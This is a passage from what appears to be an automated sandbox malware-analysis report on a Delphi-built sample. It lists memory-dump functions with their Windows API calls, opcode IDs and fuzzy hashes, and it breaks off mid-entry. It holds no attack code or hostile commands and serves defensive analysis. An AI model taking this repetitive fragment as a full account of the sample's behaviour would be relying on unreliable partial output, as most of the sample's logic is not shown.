                                                                                                                        • lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 02D35BE8
                                                                                                                        • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 02D35BF5
                                                                                                                        • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 02D35BFB
                                                                                                                        • lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 02D35C26
                                                                                                                        • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02D35C6D
                                                                                                                        • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02D35C7D
                                                                                                                        • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02D35CA5
                                                                                                                        • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02D35CB5
                                                                                                                        • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 02D35CDB
                                                                                                                        • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 02D35CEB
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2268216794.0000000002D31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D30000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2268192586.0000000002D30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2d30000_jW3NEKvxH1.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: lstrcpyn$LibraryLoad$Locale$InfoThreadlstrlen
                                                                                                                        • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                                                                                                                        • API String ID: 1599918012-2375825460
                                                                                                                        • Opcode ID: 8b0727ff8eacdafd1fa5d25497bf18fe7d1f96c39f01eed16574b8fc4031b0a7
                                                                                                                        • Instruction ID: a38ec1fe555bbd654b3abce7599cc8427f6a9f0c89f8ae02c13ca906bbdaf560
                                                                                                                        • Opcode Fuzzy Hash: 8b0727ff8eacdafd1fa5d25497bf18fe7d1f96c39f01eed16574b8fc4031b0a7
                                                                                                                        • Instruction Fuzzy Hash: 4631C776E0026D2AEB27D6B4DC46FDE77AD9B04384F4441E19608E6281D774DF84CF60
                                                                                                                        Function 02DF83B0 Relevance: 3.5, APIs: 2, Instructions: 464COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D30000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2268192586.0000000002D30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268216794.0000000002D31000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2d30000_jW3NEKvxH1.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 6f628971186b7869ff55a994468a376647b4631b563bdc3b7b4e6f267e50c07e
                                                                                                                        • Instruction ID: 2c6e458df31f32518bebd5361ba0d330b3acd79e1ed32170c3f554ffe75a4988
                                                                                                                        • Opcode Fuzzy Hash: 6f628971186b7869ff55a994468a376647b4631b563bdc3b7b4e6f267e50c07e
                                                                                                                        • Instruction Fuzzy Hash: CD021C71E002199BDF54CFA9D8807AEBBF2EF88314F158269D919E7380D731AE41CB95
                                                                                                                        Function 02E0A490 Relevance: 2.9, APIs: 1, Instructions: 1381COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D30000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2268192586.0000000002D30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268216794.0000000002D31000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2d30000_jW3NEKvxH1.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: __floor_pentium4
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 4168288129-0
                                                                                                                        • Opcode ID: c9424e6ecc37e7eae514543f3a9fb24970c65604282ac3aa02e964e22bbdf43c
                                                                                                                        • Instruction ID: 00399ee90f6e53a111f05170b35653705e14e4784720e829681531571e9c3c10
                                                                                                                        • Opcode Fuzzy Hash: c9424e6ecc37e7eae514543f3a9fb24970c65604282ac3aa02e964e22bbdf43c
                                                                                                                        • Instruction Fuzzy Hash: 04C22A71E446288FDB25CE289D807EAB7B5FB44309F1591EAD54DE7280E774AEC28F40
                                                                                                                        Function 02DE9FD9 Relevance: 1.8, Strings: 1, Instructions: 500COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D30000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2268192586.0000000002D30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268216794.0000000002D31000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2d30000_jW3NEKvxH1.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: 0
                                                                                                                        • API String ID: 0-4108050209
                                                                                                                        • Opcode ID: d7e2f1edd223cd44d70c9618c0c5ab444609e4c73f269a0cd31c5ec718f0b721
                                                                                                                        • Instruction ID: 21397b150afef2e49d2f00704baabffd9fd2553787cd287d8d09a86fac37d673
                                                                                                                        • Opcode Fuzzy Hash: d7e2f1edd223cd44d70c9618c0c5ab444609e4c73f269a0cd31c5ec718f0b721
                                                                                                                        • Instruction Fuzzy Hash: 340272327093008BDB14EF29D861A6FF3E2EFC8714F15492DF586AB380DA74AD458A56
                                                                                                                        Function 02DCA4D5 Relevance: 1.6, Strings: 1, Instructions: 391COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D30000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2268192586.0000000002D30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268216794.0000000002D31000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2d30000_jW3NEKvxH1.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: >G
                                                                                                                        • API String ID: 0-1296849874
                                                                                                                        • Opcode ID: d44b3566b9965a168e2b8c107c39c002a270cdccbaa5276ec947d3761fa4e4a6
                                                                                                                        • Instruction ID: 17dd3c5df6a13d9586ec86044df29e45167c2ed7eecdfb45fba0b65acfec34a6
                                                                                                                        • Opcode Fuzzy Hash: d44b3566b9965a168e2b8c107c39c002a270cdccbaa5276ec947d3761fa4e4a6
                                                                                                                        • Instruction Fuzzy Hash: ADB1E671E04285EBCB05FB748CB5AEE769ADF50700F90452DEA47933D4EE649E048EB2
                                                                                                                        Function 02D37FD2 Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetDiskFreeSpaceA.KERNEL32(?,?,?,?,?), ref: 02D37FF5
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2268216794.0000000002D31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D30000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2268192586.0000000002D30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2d30000_jW3NEKvxH1.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: DiskFreeSpace
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1705453755-0
                                                                                                                        • Opcode ID: c3e0a068419184d7cdb4846bb4635073bd8f3b1816a615b6fba0b6092501f7fc
                                                                                                                        • Instruction ID: 19bc4cb3cafdec4c004d7e299484ca893c3014fefba015642466dc28793dcc02
                                                                                                                        • Opcode Fuzzy Hash: c3e0a068419184d7cdb4846bb4635073bd8f3b1816a615b6fba0b6092501f7fc
                                                                                                                        • Instruction Fuzzy Hash: 2B11BEB5A01209AF9B05CF99C8819AFF7F9FFC8300F54C569A505E7254E6719E018BA0
                                                                                                                        Function 02D3A7C4 Relevance: 1.5, APIs: 1, Instructions: 29COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 02D3A7E2
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2268216794.0000000002D31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D30000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2268192586.0000000002D30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2d30000_jW3NEKvxH1.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: InfoLocale
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2299586839-0
                                                                                                                        • Opcode ID: e4a4f5238fe2b89d356e7e49d78e4b786299a6a1796c12883d610745802d8045
                                                                                                                        • Instruction ID: 646feb6555ddfec8225e534e52993375be2641c2b329933cc077e5275030be9b
                                                                                                                        • Opcode Fuzzy Hash: e4a4f5238fe2b89d356e7e49d78e4b786299a6a1796c12883d610745802d8045
                                                                                                                        • Instruction Fuzzy Hash: BFE0D873B0021427D312A558DC80EF6735DDB58710F0042BABE45C7385EDE4DE804AF8
                                                                                                                        Function 02D3B78C Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetVersionExA.KERNEL32(?,02D5D106,00000000,02D5D11E), ref: 02D3B79A
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2268216794.0000000002D31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D30000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2268192586.0000000002D30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2d30000_jW3NEKvxH1.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Version
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1889659487-0
                                                                                                                        • Opcode ID: a159cd78ac7fc2caba8035194fce67f9a3066b832ef624f0f1322c455005e301
                                                                                                                        • Instruction ID: f54f602ebc2ab332752ff59892df08a3357b900674b03ada858f31e5ea8f3bbd
                                                                                                                        • Opcode Fuzzy Hash: a159cd78ac7fc2caba8035194fce67f9a3066b832ef624f0f1322c455005e301
                                                                                                                        • Instruction Fuzzy Hash: 3EF034B4904311AFD340EF28D440A167BE9FB48704F008D29EA98C7380E7B8DE18DFA2
                                                                                                                        Function 02D3A810 Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,02D3BE72,00000000,02D3C08B,?,?,00000000,00000000), ref: 02D3A823
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2268216794.0000000002D31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D30000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2268192586.0000000002D30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2d30000_jW3NEKvxH1.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: InfoLocale
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2299586839-0
                                                                                                                        • Opcode ID: d4400675b37800bae6f97b663feac51f5f6a0a7098a31e52e30e5399d422cbaa
                                                                                                                        • Instruction ID: d9a90bccd35d7d6353b7ec3cb3a01c54fda5cd109f57aa0b0820030c9ab08e3e
                                                                                                                        • Opcode Fuzzy Hash: d4400675b37800bae6f97b663feac51f5f6a0a7098a31e52e30e5399d422cbaa
                                                                                                                        • Instruction Fuzzy Hash: 11D05EA630E2A03AA215915AAD84D7B5ADCCAC67A1F00407ABAC8C6341D200CC07DAB1
                                                                                                                        Function 02D3920C Relevance: 1.5, APIs: 1, Instructions: 6timeCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2268216794.0000000002D31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D30000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2268192586.0000000002D30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2d30000_jW3NEKvxH1.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: LocalTime
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 481472006-0
                                                                                                                        • Opcode ID: 2011951a752d329e78ca378c5827ecb81dc4292a3beff4a2dc5c32cf1b86488c
                                                                                                                        • Instruction ID: f0dedce113afc6da29659b2df8e6dda3abfe0e58ae0c3ab02d511e10642d4c3b
                                                                                                                        • Opcode Fuzzy Hash: 2011951a752d329e78ca378c5827ecb81dc4292a3beff4a2dc5c32cf1b86488c
                                                                                                                        • Instruction Fuzzy Hash: 31A0124040486052C54033184C0253430449810A20FC4878068F8403D0E91D452080F7
                                                                                                                        Function 02DF419C Relevance: 1.5, Strings: 1, Instructions: 214COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D30000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2268192586.0000000002D30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268216794.0000000002D31000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2d30000_jW3NEKvxH1.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: 0
                                                                                                                        • API String ID: 0-4108050209
                                                                                                                        • Opcode ID: 0cdc0b4430c882dd513f9aba2f942575131dd1f5e6007437ccc46010af73f7df
                                                                                                                        • Instruction ID: 41b88363666640e9d25608007880aa7097111d96eeba597bd4d77e8dcfb9904c
                                                                                                                        • Opcode Fuzzy Hash: 0cdc0b4430c882dd513f9aba2f942575131dd1f5e6007437ccc46010af73f7df
                                                                                                                        • Instruction Fuzzy Hash: 1F51432160068497DFF48A6895557BF23CA9F52308F0B8A29DBC297781C715EE42C62D
                                                                                                                        Function 02DF3F6D Relevance: 1.5, Strings: 1, Instructions: 214COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D30000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2268192586.0000000002D30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268216794.0000000002D31000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2d30000_jW3NEKvxH1.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: 0
                                                                                                                        • API String ID: 0-4108050209
                                                                                                                        • Opcode ID: e4e8e107ebb569481f6dec165aac6f3bea1aaf1a879556bc36ff33913e703c4a
                                                                                                                        • Instruction ID: 079e15be7a74b211d4db4ed27f1d410c6efee68b21b6823ffa3e0c9ffc83df02
                                                                                                                        • Opcode Fuzzy Hash: e4e8e107ebb569481f6dec165aac6f3bea1aaf1a879556bc36ff33913e703c4a
                                                                                                                        • Instruction Fuzzy Hash: F851A56160068657DFF4892884547BF63EADF02308F2B0849DB86CBBC1C725DE46C36E
                                                                                                                        Function 02DDE403 Relevance: 1.3, Strings: 1, Instructions: 96COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D30000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2268192586.0000000002D30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268216794.0000000002D31000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2d30000_jW3NEKvxH1.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: @
                                                                                                                        • API String ID: 0-2766056989
                                                                                                                        • Opcode ID: 277f5b14ebfb31d9acdfcb19b599133ffeee57438103c682c3dacb2c81b16d7f
                                                                                                                        • Instruction ID: cdd5a82420af1c8aa9d65767f302305b333654075b8968f9bcfb6bbcb06a326b
                                                                                                                        • Opcode Fuzzy Hash: 277f5b14ebfb31d9acdfcb19b599133ffeee57438103c682c3dacb2c81b16d7f
                                                                                                                        • Instruction Fuzzy Hash: D7412375918B058FC324CE29C58061BFBE1FBC8314F148A2EF99A93350D775E980CB82
                                                                                                                        Function 02E03CC9 Relevance: .6, Instructions: 637COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D30000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2268192586.0000000002D30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268216794.0000000002D31000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2d30000_jW3NEKvxH1.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: f2cbc3ef723e4b3c396aaf57060077168d27b39940edee7cc2abc770469516ea
                                                                                                                        • Instruction ID: 4721ba8986872c2bffac2ebf25a36491b9b57220afc5d969eb5b902c07a6e908
                                                                                                                        • Opcode Fuzzy Hash: f2cbc3ef723e4b3c396aaf57060077168d27b39940edee7cc2abc770469516ea
                                                                                                                        • Instruction Fuzzy Hash: D4322322D69F414DD7239634D962335A688AFB73C9F15E737E81AB5DEAEB28C4C34100
                                                                                                                        Function 02D8BCF4 Relevance: .6, Instructions: 615COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmp, Offset: 02D30000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2268192586.0000000002D30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268216794.0000000002D31000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2d30000_jW3NEKvxH1.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
